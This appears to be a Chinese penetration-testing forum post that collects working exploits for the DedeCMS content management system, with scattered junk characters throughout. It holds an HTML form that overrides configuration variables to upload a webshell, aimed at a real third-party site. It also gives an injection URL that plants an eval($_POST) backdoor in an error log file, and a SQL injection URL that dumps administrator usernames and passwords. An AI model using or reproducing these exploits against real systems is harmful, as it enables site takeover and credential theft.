' P! t. l  W, X# z$ R* U( g5 }) f3 B9 a$ ^: r! q- f3 @( z

3 ^% Y+ i0 L' _, z
( M4 x, o6 b) V( s2 K
. r/ R% h' F' s4 ?. z& p3 G+ s- J1 L
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
# `7 U; s( B( G# F' D<html>
1 ~) B; F5 ]* ~* S" N0 _- m<head>3 O" l2 q$ l* B0 G2 p6 r$ R
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>" a& J0 O5 D5 s6 \5 s5 [# g, w
</head>
/ z7 C# N" _3 X* O# H8 ^0 C* C<body style="FONT-SIZE: 9pt">9 P/ ~! B7 J2 e/ A& m. U& i) o) `
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />' o' u5 A' U+ _. a
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
- _* z% V8 f4 y# Y) ^7 M<input type='hidden' name='activepath' value='/data/cache/' />
. B3 [+ F+ @# k/ N<input type='hidden' name='cfg_basedir' value='../../' />
1 {8 `5 U) d3 t: u+ I; H<input type='hidden' name='cfg_imgtype' value='php' />
6 ~6 m+ ]" v; P6 \<input type='hidden' name='cfg_not_allowall' value='txt' />
- N; p! ?& k9 i& s/ Q( u+ h<input type='hidden' name='cfg_softtype' value='php' />4 M7 U! T6 d' F( l) d* z
<input type='hidden' name='cfg_mediatype' value='php' />- I/ J$ R1 T9 a  U3 L4 q
<input type='hidden' name='f' value='form1.enclosure' />
( X- Y( R0 N: L% l; J: i* g8 C6 g<input type='hidden' name='job' value='upload' />
5 A' H1 u# y! |) {( ~' o. t<input type='hidden' name='newname' value='fly.php' />" p: y' q# f9 k- f6 f
Select U Shell <input type='file' name='uploadfile' size='25' />
7 J5 S3 L* y  u0 {<input type='submit' name='sb1' value='确定' />6 c# h; t/ z" U( ^1 b' }
</form>$ k  s* h7 b' M# ^- B
<br />It's just a exp for the bug of Dedecms V55...<br />$ A" F& k, t9 K
Need register_globals = on...<br />* ~: Y' V3 H9 p: J4 c0 M; b' j
Fun the game,get a webshell at /data/cache/fly.php...<br />8 z+ t) G0 q9 ]: {. \4 @
</body>, i: e0 ?2 j/ H3 j8 w" h( m
</html>
8 s8 g' H2 \' _2 a4 \& _1 H2 p* @, p( J
: |8 y9 p7 s' B" g! o

3 R' j! Y. [1 r' s/ }
: ~/ h8 y" ]6 w3 }* J4 q5 S9 X3 N, H; S) v1 {3 R

, ]* C, F9 @: c- d& e9 C& q4 b1 W( k1 Q9 w" Y

0 N) ]- i2 t" A
& e9 C& n7 R1 U: a9 A) A3 U# n" ~. g! @: _0 X. E- @# L* P
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞- G1 G4 F+ \# Q% R+ w1 r$ j4 x
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
5 _. m) y3 z4 z4 ]; x2 S1. 访问网址:
0 [0 R  ?! W0 _/ F3 f
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
4 P7 z9 |2 b, l$ ^5 m可看见错误信息
* K. @0 k, g% m: d  G
) ~# a& X# q4 j! |, Z; X
, r$ G* i, c; S0 V. f9 e2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。. f0 J  v5 l5 V9 h
int(3) Error: Illegal double '1024e1024' value found during parsing3 {/ K1 y. Y& n
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
* J" H( n, T( i1 O. ~( j* ?) |, u  Y- a# Y8 b( H" Q6 o9 k

% t0 r; z8 _. [4 k3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
8 S0 F6 D/ u% x5 E# a
0 H# t* b2 }6 \5 v2 C  z# i' P' {- ^/ y
<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
' i$ c" R! @/ v) U" ~
+ @7 _) G; L1 c( n8 f# H
) C" S' E, A! c按确定后的看到第2步骤的信息表示文件木马上传成功." v( l7 t/ a0 o1 R0 l6 J, \1 X
+ [. [1 I/ K6 ^7 V; ^6 `
: u% S7 C. i* S* ]; @" v

5 |/ C& Y9 n0 [4 F2 e: W. M: W5 b8 x$ E6 {' E4 N

& j. G( ?- A" A$ P' U' ~* T
: f; r! U) A: u7 `4 u2 g1 q% R" B* F3 L% A$ V; F) n! s9 N
) d# y+ \: N/ X1 E0 S

+ B& G9 \7 X( J- U, E' |; q/ B
" t0 {8 F. D6 k2 x9 Z, ?+ `# Z+ N
. U8 `$ k- a, h6 Z% @+ w- i# Q; b$ }' a7 W8 b! E
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
/ ?* ?# m9 W; O( Shttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2